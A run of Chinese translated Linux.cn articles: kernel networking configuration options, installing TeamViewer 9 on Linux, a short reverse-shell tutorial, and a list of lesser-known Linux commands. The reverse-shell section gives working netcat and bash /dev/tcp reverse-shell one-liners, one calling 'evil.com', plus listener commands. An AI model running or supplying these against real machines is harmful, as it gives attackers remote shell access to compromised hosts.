下一个网络通常是用于不同自动设备间的小型无线连接(IEEE Std 802.15.4 Low-Rate Wireless Personal Area Networks support)。802.15.4是一种需要很少电量的简单低数据率协议。这个无线协议最大可扩展到10米。这在通过无线网络连接机器人传感器时是很有用的。任何不该有线缆的机械可能都会从这个代替了绳子的本地无线网络中获益。

如果启用了上面的特性，那么最好明智地启用这个IPv6 压缩特性(6lowpan support over IEEE 802.15.4)。

支持物理层 IEEE 802.15.4协议的SoftMac设备可以启用这个特性(Generic IEEE 802.15.4 Soft Networking Stack (mac802154))。

当有许多包需要传输时，内核必须决定先发送哪一个(它们不能一次全部发送)，所以这个特性帮助内核区分包的优先级(QoS and/or fair queuing)。如果不启用这个，那么内核会使用”first come, first serve approach”(“谁先到，谁先服务”)。这可能意味着紧急的网络消息需要等待才能轮到它们传输。

在有数据中心服务器的网络中，这个特性强烈建议启用(Data Center Bridging support)。这个特性增强了以太网对数据中心网络的连接。

DNS查询可以在下一个选项中启用(DNS Resolver support)。大多数存储DNS缓存的系统允许计算机无需DNS服务器的辅助下执行DNS查询。

接下来是另一个用于多跳专用网状网络(B.A.T.M.A.N. Advanced Meshing Protocol)。”B.A.T.M.A.N.”代表”better approach to mobile ad-hoc networking”(更好接入移动专用网络)。这个工作与有线和无线网络。专用网络没有中心像路由器这类中心设置。每台网络上的设备就像个一台路由器。网状网络是一个简单的概念。每个节点必须路由发送给它的数据。在这个网状网络中，每台计算机连接到全部或几乎全部其他网络设备。当这样的网络画在纸上成为一张地图时，这个网络看上去就像一张网。

当许多网状节点连接到相同的LAN和网时，一些网络信号可能会回环(Bridge Loop Avoidance)(避免桥回环)。这个特性可以避免此类的回环。这些回环可能永远不会结束或者降低性能。避免这样的回环被称为”Bridge Loop Avoidance (BLA)”。

分布式ARP表(Distributed ARP Tables (DAT))被用于增强ARP在稀疏无线网状网络的可靠性(Distributed ARP Table)。

BATMAN协议有些开发者需要用到的调式特性(B.A.T.M.A.N. Debugging)。对于任何调试特性，通常最好禁用它来节省空间以及得到一个更好优化后的内核。

虚拟化环境可以从”Open vSwitch”中得益。这是一个多层以太网交换机。Open vSwitch支持大量的协议。

虚拟机、hypervisor、主机之间的网络连接需要”virtual socket protocol”。这个类似于TCP/IP.这些套接字就像其他网络套接字，但是它们针对虚拟机。这允许客户机系统拥有一个与主机的网络连接。

这是一个可以管理网络优先级的cgroup子系统(Network priority cgroup)。这允许控制组(cgroup)根据发送应用设置网络流量优先级。

BPF过滤器由解释器处理，但是内核可以执行原生BPF过滤通过这个(enable BPF Just In Time compiler)。BPF代表的是”Berkeley Packet Filter”(伯克利报过滤器)。这允许计算机系统支持原生链路层包。

下面，我们有两个网络测试工具。第一个是”Packet Generator”(包生成器)，这用于测试网络时注射数据包(制造空包)。第二个，允许设置一个警报系统，当数据包丢失时警告用户/系统(Network packet drop alerting service)。

Linux内核可以用于无线电系统或者远程控制它们。”Amateur Radio AX.25 Level 2 protocol”用于计算机通过无线电通信。这个无线电协议可以在其他许多的协议中支持TCP/IP。

为了放置在AX.25网络中冲突，启用DAMA(AX.25 DAMA Slave support)。至今为止，Linux还不能作为DAMA的服务器，但是可以作为DAMA的客户端。DAMA代表”Demand Assigned Multiple Access”(按需分配多址访问)。DAMA分配网络流量到特定的信道中去。

NET/ROM是AX.25的路由层。(Amateur Radio NET/ROM protocol)。

NET/ROM的一个替代是”Packet Layer Protocol (PLP)”(包层协议)，它可以运行在AX.25的顶端(Amateur Radio X.25 PLP (Rose))。

控制器局域网络(Controller Area Network (CAN))总线需要这个驱动(CAN bus subsystem support)。CAN总线是一种用于不同目的的串行协议。

使用这个特性(Raw CAN Protocol (raw access with CAN-ID filtering))，CAN总线可以通过BSD套接字API访问

内核中有用于CAN协议的广播管理(Broadcast Manager CAN Protocol (with content filtering))。这个管理提供了很多控制，包括内容过滤。

为了让Linux盒子成为一个CAN路由器和/或者网关，需要这个特性(CAN Gateway/Router (with netlink configuration))。

注意：网关是两个或者更多网络的接口设备，它提供不同的协议。一个简单的定义可以是”网关是一个协议转换器。”

注意：路由器转发网络流量和连接使用相同协议网络。

如果启用了(一些选项)，Linux内核可以支持很多CAN设备(主要是控制器)和接口。所有的CAN驱动都是对于这些设备的不同品牌和型号。在配置工具中，它们有以下这些标题。

• Virtual Local CAN Interface (vcan)
• Serial / USB serial CAN Adaptors (slcan)
• Platform CAN drivers with Netlink support
• Enable LED triggers for Netlink based drivers
• Microchip MCP251x SPI CAN controllers
• Janz VMOD-ICAN3 Intelligent CAN controller
• Intel EG20T PCH CAN controller
• Philips/NXP SJA1000 devices
• Bosch CCAN/DCAN devices
• Bosch CC770 and Intel AN82527 devices
• CAN USB interfaces
• Softing Gmbh CAN generic support
• Softing Gmbh CAN pcmcia cards

像Linux中的其他许多特性，CAN设备同样可以启用调试能力(CAN devices debugging messages)。再说一次，记住你内核的目的，你需要调试还是需要性能?

Linux内核同样支持红外线信号协议IrDA (infrared) subsystem support)。IrDa代表的是 “Infrared Data Associations”(红外数据协会)；这是红外信号的标准。

许多人如今想要蓝牙特性(Bluetooth subsystem support)。

RxRPC会话套接字可以启用(RxRPC session sockets)。这些套接字使用RxRPC协议运载网络连接。RxRPC运行于UDP的顶部。

如果启用的话，Linux内核可以支持”RxRPC dynamic debugging”(RxRPC 动态调试)。

RxRPC拥有kerberos 4和AFS kaserver安全特性可以启用(RxRPC Kerberos security)。Kerberos是一种每个网络设备在传输任何数据前都被需要证明彼此的身份的验证协议。

对于电脑的无线网络设备像Wifi，配置工具需要启用无线局域网(802.11)设备(cfg80211 – wireless configuration API)。cfg80211代表”Configuration 802.11″(配置 802.11)。802.11是一种无线规范。

“nl80211 testmode command”是用于校准并且/或验证的实用工具，它无线设备芯片上执行这些任务。

下一个设置允许用户”enable developer warnings”(启用开发者警告)对于cfg80211设备。

下面，”cfg80211 regulatory debugging”(cfg80211调控调试)可以启用。

下面的设定是”cfg80211 certification onus”(cfg80211证书义务)。

应该为cfg80211兼容设备启用省电特性(enable powersave by default)。

cfg80211支持debugfs入口(cfg80211 DebugFS entries)。

无线设备有它们遵守的调整规则；这些被存储在数据库中(use statically compiled regulatory rules database)(使用静态编译的调整规则数据库)

一些使用基于cfg80211的驱动扩展可能需要使用一个老的用户空间。这个特性允许这个行为(cfg80211 wireless extensions compatibility)(cfg80211 无线扩展兼容)。

lib80211可以提供调试特性(lib80211 debugging messages)。

独立于硬件的IEEE 802.11标准可以启用(Generic IEEE 802.11 Networking Stack (mac80211))。mac80211是一种用于编写softMAC无线设备驱动的框架。SoftMac允许很好地控制和配置设备。

下一个特性允许mac80211使用PID控制器管理TX(发送)速率(PID controller based rate control algorithm)(PID控制器基于速率控制算法)。TX单位是BFS(Bits per minute)(位/秒)。特别地，这个特性是用于控制数据流速率的算法。

另外一个相同特性的算法叫做”Minstrel”。这是一个比TX速率管理算法更精确和有效的算法。

Minstrel同样支持802.11n(Minstrel 802.11n support)。

由于有两种TX速率控制算法，但只能使用一种。所哟必须设备一个默认的(Default rate control algorithm (Minstrel))。通常地，最好选择Minstrel作为默认。

802.11s网状网络草案可以在内核中启用(Enable mac80211 mesh networking (pre-802.11s) support)。802.11s草案是网状网络的无线标准。

对于支持这个特性的设备，对于不同包流量时间的LED除法器特性可以启用(Enable LED triggers)。在我的以太网设备商上，当端口是活跃时LED灯会点亮。这些驱动可以是这些LED在包流量时间下工作。

mac80211同样支持debugfs特性(Export mac80211 internals in DebugFS)。

这是一个独立于典型日志系统收集mac80211调试信息的特性(Trace all mac80211 debug messages)。

这是另外一组mac80211调试特性，但是这些使用的是典型日志系统(Select mac80211 debugging features —>)。在这个菜单，选择你需要的调试特性。

在下一篇文章中，我们还有更多的需要配置。

via: http://www.linux.org/threads/the-linux-kernel-configuring-the-kernel-part-9.4568/

译者：geekpi 校对：wxy

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2392-1.html

这篇指南介绍了怎么样在 RedHat、 CentOS、 Fedora 和 Debian、 Ubuntu、 Linux Mint、 Xubuntu 等这些系统中安装 Teamviewer 9。Teamviewer 是一款流行的应用软件，用于远程辅助、桌面共享、计算机之间互传文件、网络会议及在线会议等方面，并且它是一款专业应用程序。而且，个人用户可以免费使用。Teamviewer可以运行在 Windows、Linux、Mac OS、Android 系统以及 iPhone 设备上，它使用它自己集成的 WINE 环境来运行，所以我们用的时候不需单独安装 WINE 程序了。 Teamviewer 并不是原生的 Linux 应用程序。

最新的稳定版本 TeamViewer 9 近期已经发布了，有了些新的功能和性能的改进。在 TeamViewer 9 中增加的一些新功能特性，其要点如下：

Windows、Linux 和 Mac 系统下的功能特性

• 在不同的选项卡中打开多个链接
• 支持局域网唤醒
• 支持为 TeamViewer 帐户添加双因子身份验证
• 支持 Windows 8.1 和 Mac OS X Mavericks 系统
• 能保存自定义模块，如uickSupport、QuickJoin等等
• 集成了应用程序编程接口(API)
• 更强的 Teamviewer 账户安全
• 通过桌面快捷方式快速连接
• 可视化通知信息
• 不同计算机间复制和粘贴文件和文本
• 不同计算机间的初始化文件传输
• 视频传输更快

在 RedHat、 CentOS、 Fedora 上安装 Teamviewer 9

你可以在 teamviewer_linux.rpm 上下载到基于 Linux 发行版本的 rpm 包。

# wget http://www.teamviewer.com/download/teamviewer_linux.rpm

然后开始安装。进入你的下载包所在的目录，执行如下的 yum 命令来安装，它将会自动安装需要的依赖包。

# yum install teamviewer_linux.rpm

如果出现公钥缺失错误，你可以用如下命令来下载，并导入之。

# wget http://www.teamviewer.com/link/?url=354858
# rpm --import TeamViewer_Linux_PubKey.asc

在导入公钥后，请再一次运行 “ yum install ” 命令来安装 Teamviewer rpm 包。

要启动运行 Teamviewer 应用，从终端中运行如下命令。

# teamviewer

Teamviewer 应用程序正运行在我的 Fedora 18 系统上。

Fedora 18 系统上运行的 TeamViewer

在 Ubuntu, Linux Mint, Xubuntu 上安装 Teamviewer 9

你可以在 teamviewer linux .deb 上下载到基于 32-位 系统或 64-位 系统的 teamviewer 安装包，或者你可以用如下所示的 wget 命令来下载安装包。

## 32 位系统 ##
$ sudo wget http://www.teamviewer.com/download/teamviewer_linux.deb
## 64 位系统 ##
$ sudo wget http://www.teamviewer.com/download/teamviewer_linux_x64.deb

一旦下载好，就可以进入你下载的 Teamviewer 包所在的目录，然后运行如下命令来安装。

## 32 位系统 ##
$ sudo dpkg -i teamviewer_linux.deb
## 64 位系统 ##
$ sudo dpkg -i teamviewer_linux_x64.deb

如果出现有缺失依赖包错误这种情况，请使用如下命令来安装这些依赖包。

sudo apt-get install -f

一旦全部都安装成功，在 Ubuntu 系统中要启动 Teamviewer，打开 Dash 主窗口，输入 teamviewer ，然后点击出现的 teamviewer 图标，程序就启动运行了。

Ubuntu 13.10 系统上运行的 TeamViewer

Teamviewer 应用程序正运行在我的 Ubuntu 13.10 系统上。

在 Ubuntu 13.10 下的 TeamViewer 9

要在 Linux Mint 上启动，进入 菜单 >> 网络 >> Teamviewer， 并点击 接受许可协议 来启动运行 TeamViewer。

Teamviewer 应用程序正运行在我的 Linux Mint 15 系统上。

Linux Mint 15 系统上运行的 TeamViewer

via: http://www.tecmint.com/how-to-install-teamviewer-on-linux-distributions/

译者：runningwater 校对：Caroline

本文由 LCTT 原创翻译，Linux中国 荣誉推出

来源：https://linux.cn/article-2393-1.html

反向shell(Reverse shell)是一种往远程机器发送shell命令的技术，当远程机器处在防火墙等其它东西后面时，这种技术会变得非常有用。你也许会说，“一个普通的shell或简单的SSH通道不是也能实现这些吗？”不，无法实现。在网上，我看到很多人对普通shell和反向shell之间的区别分不清。在我们开始下面的内容前，先弄清楚这些概念。

反向Shell(Reverse Shell)

• 反向shell的工作方式是远程计算机将自己的shell发送给特定的用户，而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样，你就可以对远程服务器执行root命令。

Bind Shell

• bind shell是用户用BSAH，将shell绑定到一个本地端口上，这样任何人都可以在本地网络中发送命令。

反向shell经常会被黑客用来做一些不法行为，例如入侵了一台服务器后，他们会设置一个反向shell，将来他们就能通过这个shell轻松的访问这台远程计算机。我相信你是不会用它来做这种事情的。

环境要求

• 远程Unix主机
• 安装了netcat

使用NetCat实现反向shell交互

当通过shell登录到远程主机后，下面的指令能轻松的将shell发送到你的机器上：

nc -c /bin/sh <你的IP> <任何一个未封锁的端口>

你甚至能通过netcat来pipe BASH。

/bin/sh | nc <你的IP> <任何未封锁的端口>

然后监听这个shell：

nc -l -p <相同的端口> -vvv

通过BASH实现反向shell

这种技术是当远程机器上没有netcat或你想做一些非自然的事情而不想留下太重的痕迹时使用。

监听shell：

nc -l -p <任何未封锁的端口> -vvv

先创建一个新的描述符，分配到一个网络节点。这样我们可以对这个描述符进行读写。

exec 5<>/dev/tcp/evil.com/<相同的端口> $ cat <&5 | while read line; do $line 2>&5 >&5; done

或另外一个反向shell：

0<&196;exec 196<>/dev/tcp/<你的IP>/<相同的端口>; sh <&196 >&196 2>&196

这样，你就可以轻松是通过netcat发送任何命令了。

Linux命令行吸引了大多数Linux爱好者。一个正常的Linux用户一般掌握大约50-60个命令来处理每日的任务。Linux命令和它们的转换对于Linux用户、Shell脚本程序员和管理员来说是最有价值的宝藏。有些Linux命令很少人知道，但不管你是新手还是高级用户，它们都非常方便有用。

这篇文章的目的是介绍一些少有人知的Linux命令，它们一定会高效地帮你管理你的桌面/服务器。

1. sudo !!命令

没有特定输入sudo命令而运行，将给出没有权限的错误。那么，你不需要重写整个命令，仅仅输入’!!‘就可以抓取最后的命令。

$ apt-get update
E: Could not open lock file /var/lib/apt/lists/lock - open (13: Permission denied)
E: Unable to lock directory /var/lib/apt/lists/
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

–

$ sudo !!
sudo apt-get update
[sudo] password for server:
…
..
Fetched 474 kB in 16s (28.0 kB/s)
Reading package lists... Done
server@localhost:~$

2. python命令

下面的命令生产一个通过HTTP显示文件夹结构树的简单网页，可以通过浏览器在端口8000访问，直到发出中断信号。

# python -m SimpleHTTPServer

3. mtr命令

我们大多数都熟悉ping和traceroute。那对于把两个命令的功能合二为一的mtr命令呢。如果mtr没在你的机子上安装，apt或者yum需要的包。

$ sudo apt-get install mtr (On Debian based Systems)

# yum install mtr (On Red Hat based Systems)

现在运行mtr命令，开始查看mtr运行的主机和google.com直接的网络连接。

# mtr google.com

4. Ctrl+x+e命令

这个命令对于管理员和开发者非常有用。为了使每天的任务自动化，管理员需要通过输入vi、vim、nano等打开编辑器。

仅仅从命令行快速的敲击“Ctrl-x-e”，就可以在编辑器中开始工作了。

5. nl命令

“nl命令”添加文件的行数。一个叫做’one.txt‘的文件，其每行的内容是（Fedora、Debian、Arch、Slack和Suse），给每行添加行号。首先使用cat命令显示“one.txt”的文件内容。

# cat one.txt
fedora
debian
arch
slack
suse

现在运行“nl命令”，以添加行号的方式来显示。

# nl one.txt
1 fedora
2 debian
3 arch
4 slack
5 suse

6. shuf命令

“Shut”命令随机从一个文件或文件夹中选择行/文件/文件夹。首先使用ls命令来显示文件夹的内容。

# ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
#  ls | shuf (shuffle Input)
Music
Documents
Templates
Pictures
Public
Desktop
Downloads
Videos
#  ls | shuf -n1 # 随机选择一个
Public
# ls | shuf -n1
Videos
# ls | shuf -n1
Templates
# ls | shuf -n1
Downloads

注意：你可以把‘ n1’替换成‘ n2’来输出两个随机选择或者使用 n3、 n4等数字输出其他任意的随机选择。

7. ss命令

“ss”表示socket统计。这个命令调查socket，显示类似netstat命令的信息。它可以比其他工具显示更多的TCP和状态信息。

# ss
State      Recv-Q Send-Q      Local Address:Port          Peer Address:Port
ESTAB      0      0           192.168.1.198:41250        *.*.*.*:http
CLOSE-WAIT 1      0               127.0.0.1:8000             127.0.0.1:41393
ESTAB      0      0           192.168.1.198:36239        *.*.*.*:http
ESTAB      310    0               127.0.0.1:8000             127.0.0.1:41384
ESTAB      0      0           192.168.1.198:41002       *.*.*.*:http
ESTAB      0      0               127.0.0.1:41384            127.0.0.1:8000

8. last命令

“last”命令显示的是上次登录用户的历史信息。这个命令通过搜索文件“/var/log/wtmp”，显示logged-in和logged-out及其tty‘s的用户列表。

#  last
server   pts/0        :0               Tue Oct 22 12:03   still logged in
server   tty8         :0               Tue Oct 22 12:02   still logged in
…
...
(unknown tty8         :0               Tue Oct 22 12:02 - 12:02  (00:00)
server   pts/0        :0               Tue Oct 22 10:33 - 12:02  (01:29)
server   tty7         :0               Tue Oct 22 10:05 - 12:02  (01:56)
(unknown tty7         :0               Tue Oct 22 10:04 - 10:05  (00:00)
reboot   system boot  3.2.0-4-686-pae  Tue Oct 22 10:04 - 12:44  (02:39)
wtmp begins Fri Oct  4 14:43:17 2007

9. curl ifconfig.me

那么如何得到你的外部IP地址呢？使用google？那么这个命令就在你的终端输出你的外部IP地址。

# curl ifconfig.me

注意：你可能没有按照curl包，你需要 apt/yum来按照包。

10. tree命令

以树式的格式得到当前文件夹的结构。

# tree
.
|-- Desktop
|-- Documents
|   `-- 37.odt
|-- Downloads
|   |-- attachments.zip
|   |-- ttf-indic-fonts_0.5.11_all.deb
|   |-- ttf-indic-fonts_1.1_all.deb
|   `-- wheezy-nv-install.sh
|-- Music
|-- Pictures
|   |-- Screenshot from 2013-10-22 12:03:49.png
|   `-- Screenshot from 2013-10-22 12:12:38.png
|-- Public
|-- Templates
`-- Videos
10 directories, 23 files

11. pstree

这个命令显示当前运行的所有进程及其相关的子进程，输出的是类似‘tree’命令的树状格式。

# pstree
init─┬─NetworkManager───{NetworkManager}
     ├─accounts-daemon───{accounts-daemon}
     ├─acpi_fakekeyd
     ├─acpid
     ├─apache2───10*[apache2]
     ├─at-spi-bus-laun───2*[{at-spi-bus-laun}]
     ├─atd
     ├─avahi-daemon───avahi-daemon
     ├─bluetoothd
     ├─colord───{colord}
     ├─colord-sane───2*[{colord-sane}]
     ├─console-kit-dae───64*[{console-kit-dae}]
     ├─cron
     ├─cupsd
     ├─2*[dbus-daemon]
     ├─dbus-launch
     ├─dconf-service───2*[{dconf-service}]
     ├─dovecot─┬─anvil
     │         ├─config
     │         └─log
     ├─exim4
     ├─gconfd-2
     ├─gdm3─┬─gdm-simple-slav─┬─Xorg
     │      │                 ├─gdm-session-wor─┬─x-session-manag─┬─evolution-a+
     │      │                 │                 │                 ├─gdu-notific+
     │      │                 │                 │                 ├─gnome-scree+
     │      │                 │                 │                 ├─gnome-setti+
     │      │                 │                 │                 ├─gnome-shell+++
     │      │                 │                 │                 ├─nm-applet──+++
     │      │                 │                 │                 ├─ssh-agent
     │      │                 │                 │                 ├─tracker-min+
     │      │                 │                 │                 ├─tracker-sto+
     │      │                 │                 │                 └─3*[{x-sessi+
     │      │                 │                 └─2*[{gdm-session-wor}]
     │      │                 └─{gdm-simple-slav}
     │      └─{gdm3}
     ├─6*[getty]
     ├─gnome-keyring-d───9*[{gnome-keyring-d}]
     ├─gnome-shell-cal───2*[{gnome-shell-cal}]
     ├─goa-daemon───{goa-daemon}
     ├─gsd-printer───{gsd-printer}
     ├─gvfs-afc-volume───{gvfs-afc-volume}

目前为止就这么多。在下篇文章中，我将涉及一些其他很少有人知道的有趣的Linux命令。到那时连接 Tecmint保持收看。喜欢和分享将有助于我们传播。

英文原文：11 Lesser Known Useful Linux Commands 

via: http://www.oschina.net/translate/11-lesser-known-useful-linux-commands